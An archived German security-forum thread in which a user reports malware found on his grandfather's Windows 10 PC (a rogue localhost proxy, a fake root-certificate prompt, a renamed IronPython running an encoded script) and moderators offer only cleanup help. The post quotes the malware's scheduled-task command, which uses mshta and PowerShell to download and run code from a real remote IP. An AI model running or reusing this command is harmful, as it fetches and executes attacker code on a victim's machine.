Zurück   Trojaner-Board > Archiv - Kein Posten möglich > Mülltonne

Mülltonne: sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart

Windows 7 Beiträge, die gegen unsere Regeln verstoßen haben, solche, die die Welt nicht braucht oder sonstiger Müll landet hier in der Mülltonne...

 
Alt 28.05.2021, 11:23   #1
trwhfrkhgn
 
sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart - Standard

sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart



Hallo Leute,

ich wollte mal fragen, ob mir jemand ein paar Einblicke in einen gefundenen Trojaner geben kann, z.B. wie man sowas zukünftig findet, verhindert, was der Trojaner abgefischt haben könnte, ob es ein bekannter Trojaner oder was vollkommen anderes ist, ... .
Mein Grund ist einfach nur Interesse/Wissensdurst:

Hintergrund: Mein Opa bat mich um Hilfe, weil er keine Internetseiten mehr öffnen konnte und seit heute ständig eine Zertifikatsmeldung nervte.

Drei merkwürdige Dinge habe ich auf seinem Windows 10 Rechner gefunden:
1.) In den Windows-Einstellungen war ein systemweiter Proxy eingestellt:
Code:
ATTFilter
http=localhost:8000;https=localhost:8000
         
2.) im Taskplaner fand ich folgenden Task:
Code:
ATTFilter
mshta.exe  --> vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell  Invoke-Expression -Command:(wget -uri 185.141.27.215/gate990.php -method post -body cMgEfr65 -UseBasicParsing).content"", 0 : window.close")
         
Dieser Task hat die ständige Zertifikatsmeldung erzeugt, ich solle doch bitte folgendem Stammzertifikat zukünftig vertrauen: OV Verisign CA mit einem veralteten SHA1-Fingerprint.

3.) via Autostart-Ordner wurde eine ctfmon.exe gestartet, welche sich mit vielen anderen Dateien im %Appdata%-Unterordner 4FZBwVTf befand. Allerdings ist dies nur eine umbenannte Datei, denn tatsächlich handelt es sich hierbei um IronPython v2.7.11.
Damit wurde ein base64-kodiertes Python-Script (update.phy) ausgeführt, dessen Inhalt habe ich am Ende eingefügt. Mit dessen Dekodierung bin ich leider gescheitert, denn da kam bei mir nur Bytecode raus und bin daher mit meiner Detektivarbeit am Ende meines Wissens.

Fazit:
Virenscanner oder VirusTotal.com springen natürlich nicht an und damit läuft das Teil vollkommen unter dem Radar. Zum Glück hat die o.g. Vertrauensabfrage für das Verisign-Stammzertifikat alle 5 Minuten auf sich aufmerksam gemacht. Hätte mein Opa diesem Stammzertifikat einfach genervt zugestimmt, dann hätten vermutlich monatelang Daten über den lokalen Proxy vollkommen unbemerkt abgesaugt werden können?!?

nun zu meinen Fragen und zum Grund meiner Forumanfrage:
- kann mir jemand tiefere Einblick in die Hintergründe diese Trojaner geben, z.B.
- indem jemand den base64-code dekodiert und dann dessen Zweck versteht
- wie konnte der systemweite Proxy so leicht eingetragen werden?
- ist diese Malware schon länger bekannt, vielleicht in abgewandelter Form
- wie könnte man einen Virenscanner dazu bringen eine Warnung auszugeben,
der base64-code scheint jedenfalls zu gut getarnt oder unverdächtig zu wirken
- was soll ich meinem Opa zukünftig raten, um derartige Maleware nicht auf den Rechner zu bekommen?
- wie soll er sich jetzt nach dem Befall verhalten? Ich habe ihm schon mal geraten vorsichtshalber alle wichtigen Online-Passwörter zu ändern

Den Inhalt der Datei update.py findet Ihr nachfolgend. Den gesamten Ordner unter %AppData% mit IronPython und allen Script-Dateien kann ich bei Bedarf gern zur Verfügung stellen.
Angehängte Dateien
Dateityp: zip update.py.zip (319,0 KB, 16x aufgerufen)

Alt 28.05.2021, 16:19   #2
felix1
/// Helfer-Team
 
sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart - Standard

sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart



Mir ist nicht klar, wie Du auf Trojaner kommst. Bei IronPython v2.7.11 handelt es sich um ein legitimes Programm, das irgendwer installiert hat.


Solltest Du eine Bereinigung des Rechners wünschen:


Wir bitten euch, folgendes durchzulesen und abzuarbeiten:
Für alle Hilfesuchenden! Was muss ich vor der Eröffnung eines Themas beachten?

Nur mit diesen Informationen können wir euch helfen.

Es werden grundsätzlich nur Betriebssysteme bereinigt, die noch eine offizielle Unterstützung von Microsoft erhalten.
Dies gilt aktuell für Windows 8.1 sowie Windows 10 v2004 oder neuer.
__________________

__________________

Alt 28.05.2021, 19:50   #3
M-K-D-B
/// TB-Ausbilder
 
sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart - Standard

sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart






Zitat:
Zitat von trwhfrkhgn Beitrag anzeigen
nun zu meinen Fragen und zum Grund meiner Forumanfrage:
- kann mir jemand tiefere Einblick in die Hintergründe diese Trojaner geben, z.B.
- indem jemand den base64-code dekodiert und dann dessen Zweck versteht
- wie konnte der systemweite Proxy so leicht eingetragen werden?
- ist diese Malware schon länger bekannt, vielleicht in abgewandelter Form
- wie könnte man einen Virenscanner dazu bringen eine Warnung auszugeben,
der base64-code scheint jedenfalls zu gut getarnt oder unverdächtig zu wirken
- was soll ich meinem Opa zukünftig raten, um derartige Maleware nicht auf den Rechner zu bekommen?
- wie soll er sich jetzt nach dem Befall verhalten? Ich habe ihm schon mal geraten vorsichtshalber alle wichtigen Online-Passwörter zu ändern

Den Inhalt der Datei update.py findet Ihr nachfolgend. Den gesamten Ordner unter %AppData% mit IronPython und allen Script-Dateien kann ich bei Bedarf gern zur Verfügung stellen.
Wie felix1 bereits angedeutet hat, können wir dir bei einer Bereinigung behilflich sein, nicht mehr und nicht weniger. Auf unsere Regeln hat felix1 ja bereits verlinkt.
Beim Aufspühren und Entfernen von Malware können wir helfen.

Alles andere (detailierte Analyse) überlasse ich persönlich Leuten, die Experten im Bereich Malwareanalyse sind. Da können wir dir nicht behilflich sein.

Und wie die Malware auf das System gekommen ist, könnte man evtl. nach der Analyse von Logdateien und einer Befragung herausfinden (siehe auch die häufigsten Einfallstore für Malware).

Wenn du an einer Bereinigung interessiert bist, poste die geforderten Logdateien und wir helfen bei der Bereinigung.
Wenn du kein Interesse an einer Bereinigung hast und lieber eine Neuinstallation durchführen möchtest, ist das auch in Ordnung für uns.

Wir werden hier jedoch nicht "diskutieren", in diesem Subforum geht es um die Entfernung von Malware.

Gib einfach Bescheid.
__________________
__________________

Geändert von M-K-D-B (28.05.2021 um 20:02 Uhr)

Alt 29.05.2021, 13:52   #4
trwhfrkhgn
 
sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart - Standard

sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart



Vielen Dank für Eure Rückmeldungen. Entschuldigt bitte, ich wollte die Forumregeln nicht verletzen. Ohne groß die Regeln zu lesen, ging ich davon aus, dass man sich im Trojaner-Board auch über Trojaner austauschen kann. Habt Ihr vielleicht einen Hinweis für mich, wo ich vielleicht meine Frage loswerden könnte? Ich würde gerne was dazulernen und neue Trojaner gibt's immer. Falls meine Anfrage hier vollkommen Offtopic ist, dann dürft Ihr ihn gern löschen. Ich möchte kein Störenfried auf diesem Board sein und bitte vielmals um Entschuldigung.

Alt 29.05.2021, 19:09   #5
M-K-D-B
/// TB-Ausbilder
 
sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart - Standard

sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart



Malwareanalysten (diverser Sicherheitsfirmen, wie z. B. Microsoft, Malwarebytes, Kaspersky, etc.) können dir evtl. deine Fragen beantworten.
Du solltest dort einmal nachfragen.

Ich verschiebe dieses Thema ins Archiv.


 

Themen zu sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart
a.exe, appdata, autostart, bat, befall, code, dateien, folge, frage, internetseite, localhost, maleware, malware, proxy, rechner, scan, seite, seiten, trojaner, vbscript, virus, warnung, win, windows, öffnen


« Spam | Spam »

Ähnliche Themen: sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart


  1. Trojan:Script/Phonzy.A!ml von Audacity de Win10 und Mac
    Log-Analyse und Auswertung - 05.02.2021 (6)
  2. Unter WIN10 im Explorerfenster - Chinesische (versteckte) Daten unter den zuletzt verwendeten Dateien!
    Plagegeister aller Art und deren Bekämpfung - 09.10.2020 (22)
  3. Programm zum automatischen Aktualisieren unter Win10
    Alles rund um Windows - 26.06.2019 (6)
  4. Win10: Chinesische Zeichen unter Zuletzt verwendete Dateien
    Plagegeister aller Art und deren Bekämpfung - 09.02.2019 (18)
  5. Win10 Pro: Browser stürzen ab-(Chrome&Edge)-GGF Schädlingsbefall-(Hinweise: TR/Dropper.Gen & suspected of Malware.Agent.39 "PAK_Generic.008)
    Log-Analyse und Auswertung - 20.03.2018 (17)
  6. ESET findet infizierte Datei C:\Windows\Installer\12fff.msi unter WIN10
    Plagegeister aller Art und deren Bekämpfung - 27.12.2017 (30)
  7. Win10 64Bit - unbekannte exe-Dateien im Autostart nach CCleaner 5.33.6162
    Plagegeister aller Art und deren Bekämpfung - 20.10.2017 (18)
  8. Win10: Chinesische Schriftzeichen als Dateibezeichnung unter "Zuletzt verwendete Dateien"
    Plagegeister aller Art und deren Bekämpfung - 28.08.2017 (21)
  9. Warnung, der Parameter F wurde nicht angegeben, unter Win10
    Alles rund um Windows - 14.03.2017 (2)
  10. SSD Tools unter Win10 nötig?
    Netzwerk und Hardware - 08.02.2017 (1)
  11. Bluscreen unter Win10 Upgrade Installation
    Alles rund um Windows - 29.11.2016 (27)
  12. WIN10 installiert, Rechner läuft sehr langsam und unter manchen Userkonten kein Mozilla möglich
    Log-Analyse und Auswertung - 21.02.2016 (2)
  13. Wie entferne ich "Script.Adware.DealPly.G (Engine B)" unter Windows7?
    Log-Analyse und Auswertung - 06.10.2015 (20)
  14. Autostart unter w8.1
    Alles rund um Windows - 26.11.2014 (4)
  15. Samsung Monte will Proxy-Passwort, aber kein Proxy installiert
    Smartphone, Tablet & Handy Security - 16.06.2014 (2)
  16. Antwort erwünscht
    Plagegeister aller Art und deren Bekämpfung - 24.10.2013 (22)
  17. Autostart unter DOS bearbeiten
    Alles rund um Windows - 27.10.2008 (3)

Zum Thema sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart - Hallo Leute, ich wollte mal fragen, ob mir jemand ein paar Einblicke in einen gefundenen Trojaner geben kann, z.B. wie man sowas zukünftig findet, verhindert, was der Trojaner abgefischt haben - sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart...
Archiv
Du betrachtest: sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.